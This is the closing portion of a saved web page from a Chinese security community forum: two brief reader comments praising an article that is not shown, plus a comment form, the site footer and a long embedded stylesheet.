<img class="avatar-40 hidden-xs" src='data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" width="709" height="709"><rect fill-opacity="0"/></svg>' alt data-sf-original-src=https://forum.butian.net/static/images/default_avatar.jpg style="background-blend-mode:normal!important;background-clip:content-box!important;background-position:50% 50%!important;background-color:rgba(0,0,0,0)!important;background-image:var(--sf-img-28)!important;background-size:100% 100%!important;background-origin:content-box!important;background-repeat:no-repeat!important"></a>
</div>
<div class=media-body>
<div class=media-heading>
<strong>
<a href=https://forum.butian.net/people/18148 class="mr-5 user-card">罗辑</a>
</strong>
<span class="answer-time text-muted hidden-xs">1秒前</span>
</div>
<div class=content>
<div class="text-fmt mt-10 mb-10">太强了,有点看懂了</div>
</div>
<div class=media-footer>
<ul class="list-inline mb-20">
<li><a class="comments first-comment-reply" data-toggle=collapse href=#comment-2075 data-source=2075 data-source_id=2075 data-to_user_id=18148 data-source_type=comment data-message="回复 罗辑"><i class="fa fa-comment-o"></i> 0 条评论</a></li>
<li class=pull-right>
<button class="btn btn-default btn-sm btn-support" data-source_id=2075 data-source_type=comment data-support_num=0><i class="fa fa-thumbs-o-up"></i> 0</button>
</li>
</ul>
</div>
<div class="collapse widget-comments sf-hidden" id=comment-2075>
</div>
</div>
</div>
<div class=media>
<div class=media-left>
<a href=https://forum.butian.net/people/11809 class="avatar-link user-card" target=_blank rel="noopenner noreferrer">
<img class="avatar-40 hidden-xs" src='data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" width="709" height="709"><rect fill-opacity="0"/></svg>' alt data-sf-original-src=https://forum.butian.net/static/images/default_avatar.jpg style="background-blend-mode:normal!important;background-clip:content-box!important;background-position:50% 50%!important;background-color:rgba(0,0,0,0)!important;background-image:var(--sf-img-28)!important;background-size:100% 100%!important;background-origin:content-box!important;background-repeat:no-repeat!important"></a>
</div>
<div class=media-body>
<div class=media-heading>
<strong>
<a href=https://forum.butian.net/people/11809 class="mr-5 user-card">NanNnCheng</a>
</strong>
<span class="answer-time text-muted hidden-xs">1秒前</span>
</div>
<div class=content>
<div class="text-fmt mt-10 mb-10">NB</div>
</div>
<div class=media-footer>
<ul class="list-inline mb-20">
<li><a class="comments first-comment-reply" data-toggle=collapse href=#comment-2080 data-source=2080 data-source_id=2080 data-to_user_id=11809 data-source_type=comment data-message="回复 NanNnCheng"><i class="fa fa-comment-o"></i> 0 条评论</a></li>
<li class=pull-right>
<button class="btn btn-default btn-sm btn-support" data-source_id=2080 data-source_type=comment data-support_num=0><i class="fa fa-thumbs-o-up"></i> 0</button>
</li>
</ul>
</div>
<div class="collapse widget-comments sf-hidden" id=comment-2080>
</div>
</div>
</div>
</div>
<div class="widget-comment-form row mb-20">
<form class=col-md-12>
<div class=form-group>
<textarea id=comment-content name=content placeholder=写下你的评论 class=form-control value></textarea>
</div>
</form>
<div class="col-md-12 text-right">
<button type=submit data-token=sKaWQokrOTC3iA9XXzaH65D8iBGicq4jNmsDOLZX data-source_id=527 data-source_type=article class="btn btn-primary btn-sm ml-10 comment-btn">提交评论</button>
</div>
</div>
<div class=text-center>
</div>
</div>
</div>
<div class="col-xs-12 col-md-3 side" style=display:none>
</div>
</div>
</div>
</div>
<footer id=footer>
<div class=container>
<div class=text-center>
<a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
<a href=https://forum.butian.net/sitemap>sitemap</a>
</div>
<div class="copyright mt-10">
Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
</div>
</div>
</footer>
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
</div>
<div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-527 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
</div>
<div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
</div>
<span id=cnzz_stat_icon_1279782571></span>
<div class="geetest_panel geetest_wind" style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c
Reference in New Issue Copy Permalink